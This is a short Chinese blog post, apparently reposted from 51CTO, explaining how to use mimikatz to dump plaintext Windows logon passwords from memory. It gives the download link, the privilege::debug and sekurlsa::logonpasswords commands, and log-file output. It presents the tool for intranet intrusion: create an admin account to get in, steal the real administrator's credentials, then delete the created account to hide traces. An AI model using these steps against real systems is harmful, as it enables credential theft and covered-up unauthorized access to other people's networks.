windows下抓取明文密码神器之mimikatz

Mimikatz是一款用于Windows环境下抓取内存中的明文密码的工具,能获取包括域登录密码及某些VPN密码等敏感信息。通过使用特定命令,如privilege::debug和sekurlsa::logonpasswords,可以实现密码的抓取。为避免信息显示不全,推荐使用日志记录功能。

下载地址:https://github.com/gentilkiwi/mimikatz/releases

功能:抓取windows下内存中的明文密码

简单介绍:windows下抓取密码神器之mimikatz,使用该工具可以抓取内存中的明文密码,包括登录其他域的密码,访问某些VPN的密码等!该工具主要在内网中进行使用,先通过添加管理账号登录到系统中,然后使用该工具抓取原系统中的管理员账号密码,从而删除自己创建的账号!

基本使用:

第一条:

1
privilege::debug

第二条:

1
sekurlsa::logonpasswords


    如果密码过多,导致在dos窗口显示不全,那么我们可以先开启日志记录功能,然后再使用上述密码进行密码抓取,最后在目录中访问mimikatz.log这个日志文件,即可查看你所有操作及其返回值!

使用:

1
2
3
mimikatz  # log
Using  'mimikatz.log'  for  logfile : OK
mimikatz  #



本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/1956293
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值